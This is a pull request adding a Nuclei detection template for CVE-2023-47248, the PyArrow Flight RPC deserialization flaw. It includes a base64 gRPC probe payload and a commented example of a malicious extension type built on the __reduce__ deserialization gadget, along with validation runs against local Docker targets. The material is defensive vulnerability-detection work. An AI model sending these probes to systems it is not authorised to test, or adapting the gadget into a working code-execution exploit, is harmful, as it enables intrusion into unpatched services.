### PR TITLE
Create CVE-2023-47248.yaml

### DIFF
--- a/http/cves/2023/CVE-2023-47248.yaml
+++ b/http/cves/2023/CVE-2023-47248.yaml
@@ -39,29 +39,12 @@ http:
 
         {{base64_decode("AAAAAS0KBAgBGgASpAIQAAAAAAAKAAwABgAFAAgACgAAAAABBAAMAAAACAAIAAAABAAIAAAABAAAAAEAAAAYAAAAAAASABgACAAGAAcADAAAABAAFAASAAAAAAABDxQAAADMAAAACAAAABAAAAAAAAAAAAAAAAAAAAACAAAAVAAAAAQAAAC8////CAAAACAAAAAUAAAAQVJST1c6ZXh0ZW5zaW9uOm5hbWUAAAAAFwAAAGFycm93LnB5X2V4dGVuc2lvbl90eXBlAAgADAAEAAgACAAAAAgAAAAkAAAAGAAAAEFSUk9XOmV4dGVuc2lvbjptZXRhZGF0YQAAAAAmAAAAgASVGwAAAAAAAACMCGJ1aWx0aW5zlIwHY29tcGxleJSTlClSlC4AAAQABAAEAAAA")}}
 
-    # The Base64 encoded payload in the request body is a serialized gRPC request to the "DoPut" method of the Arrow
-    # Flight RPC service. It contains a custom PyArrow extension type that, when deserialized, returns a complex number
-    # type object that expectedly doesn't have a "storage_type" attribute required by PyArrow and hence results in an
-    # exception being raised.
-    #
-    # Example malicious extension type class used in the request above:
-    # ```
-    # class MyType(pyarrow.PyExtensionType):
-    #     def __init__(self):
-    #         pyarrow.PyExtensionType.__init__(self, pa.binary(0))
-    #
-    #     def __reduce__(self):
-    #         return complex, ()
-    # ```
-    #
-    # By checking the response for the following error message in the "Grpc-Message" header, we can determine if the
-    # service is vulnerable to a remote code execution attack.
     matchers-condition: and
     matchers:
       - type: word
+        part: header
         words:
           - "'complex' object has no attribute 'storage_type'"
-        part: header
 
       - type: status
         status:

--- a/http/cves/2023/CVE-2023-47248.yaml
+++ b/http/cves/2023/CVE-2023-47248.yaml
@@ -1,0 +1,68 @@
+id: CVE-2023-47248
+
+info:
+  name: PyArrow Flight RPC - Remote Code Execution
+  author: smolse
+  severity: critical
+  description: |
+    PyArrow Flight RPC from v0.14.0 through v14.0.0 allows remote attackers to execute arbitrary code via a maliciously crafted Python-defined extension type.
+  remediation: |
+    Upgrade to PyArrow v14.0.1 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-47248
+    - https://www.cve.org/CVERecord?id=CVE-2023-47248
+    - https://github.com/apache/arrow/commit/f14170976372436ec1d03a724d8d3f3925484ecf
+    - https://github.com/smolse/poc-or-gtfo/tree/main/CVE-2023-47248
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-47248
+    cwe-id: CWE-502
+    epss-score: 0.015960000
+    epss-percentile: 0.870280000
+    cpe: cpe:2.3:a:apache:pyarrow:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: apache
+    product: pyarrow
+  tags: cve,cve2023,rce,arrow,pyarrow,apache
+
+http:
+  - raw:
+    - |
+        POST /arrow.flight.protocol.FlightService/DoPut HTTP/2
+        Host: {{Hostname}}
+        Content-Type: application/grpc
+        Te: trailers
+        Grpc-Accept-Encoding: identity, gzip, deflate
+
+        {{base64_decode("AAAAAS0KBAgBGgASpAIQAAAAAAAKAAwABgAFAAgACgAAAAABBAAMAAAACAAIAAAABAAIAAAABAAAAAEAAAAYAAAAAAASABgACAAGAAcADAAAABAAFAASAAAAAAABDxQAAADMAAAACAAAABAAAAAAAAAAAAAAAAAAAAACAAAAVAAAAAQAAAC8////CAAAACAAAAAUAAAAQVJST1c6ZXh0ZW5zaW9uOm5hbWUAAAAAFwAAAGFycm93LnB5X2V4dGVuc2lvbl90eXBlAAgADAAEAAgACAAAAAgAAAAkAAAAGAAAAEFSUk9XOmV4dGVuc2lvbjptZXRhZGF0YQAAAAAmAAAAgASVGwAAAAAAAACMCGJ1aWx0aW5zlIwHY29tcGxleJSTlClSlC4AAAQABAAEAAAA")}}
+
+    # The Base64 encoded payload in the request body is a serialized gRPC request to the "DoPut" method of the Arrow
+    # Flight RPC service. It contains a custom PyArrow extension type that, when deserialized, returns a complex number
+    # type object that expectedly doesn't have a "storage_type" attribute required by PyArrow and hence results in an
+    # exception being raised.
+    #
+    # Example malicious extension type class used in the request above:
+    # ```
+    # class MyType(pyarrow.PyExtensionType):
+    #     def __init__(self):
+    #         pyarrow.PyExtensionType.__init__(self, pa.binary(0))
+    #
+    #     def __reduce__(self):
+    #         return complex, ()
+    # ```
+    #
+    # By checking the response for the following error message in the "Grpc-Message" header, we can determine if the
+    # service is vulnerable to a remote code execution attack.
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "'complex' object has no attribute 'storage_type'"
+        part: header
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2023/CVE-2023-47248.yaml
+++ b/http/cves/2023/CVE-2023-47248.yaml
@@ -30,7 +30,7 @@ info:
 
 http:
   - raw:
-    - |
+      - |
         POST /arrow.flight.protocol.FlightService/DoPut HTTP/2
         Host: {{Hostname}}
         Content-Type: application/grpc


### PR DESCRIPTION
### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

Hello,

I have been recently tinkering with CVE-2023-47248 and along the way created a Nuclei template, which I would like to share with the community.

- Added CVE-2023-47248
- References:
  - https://nvd.nist.gov/vuln/detail/CVE-2023-47248
  - https://lists.apache.org/thread/yhy7tdfjf9hrl9vfrtzo8p2cyjq87v7n

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

I have created a Docker-based environment for exposing vulnerable services (a simple custom Arrow Flights service as well as a vulnerable instance of [TabPy](https://github.com/tableau/TabPy) that uses PyArrow under the hood) and running Nuclei against them for validation: https://github.com/smolse/poc-or-gtfo/tree/main/CVE-2023-47248/poc_flight.

First, simply start Docker services from the Docker Compose setup:
```
$ docker-compose up -d
[+] Building 0.0s (0/0)
[+] Running 3/0
 ✔ Container attacker            Running 
 ✔ Container vulnerable-service  Running
 ✔ Container vulnerable-tabpy    Running
```

Then in the Nuclei templates repo:

```
$ nuclei -fh2 -t http/cves/2023/CVE-2023-47248.yaml -u https://localhost:5005  

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.7

                projectdiscovery.io

[INF] Current nuclei version: v3.3.7 (latest)
[INF] Current nuclei-templates version: v10.1.0 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2023-47248] [http] [critical] https://localhost:5005/arrow.flight.protocol.FlightService/DoPut
```

```
nuclei -fh2 -t http/cves/2023/CVE-2023-47248.yaml -u https://localhost:13622

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.7

                projectdiscovery.io

[INF] Current nuclei version: v3.3.7 (latest)
[INF] Current nuclei-templates version: v10.1.0 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2023-47248] [http] [critical] https://localhost:13622/arrow.flight.protocol.FlightService/DoPut
```

If you update the Docker images of the vulnerable services to use PyArrow version >=14.0.1, then the template won't produce a detection.

> [!NOTE]
> This template works only against the HTTPS targets and requires the `-force-http2` flag to be set in Nuclei.

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)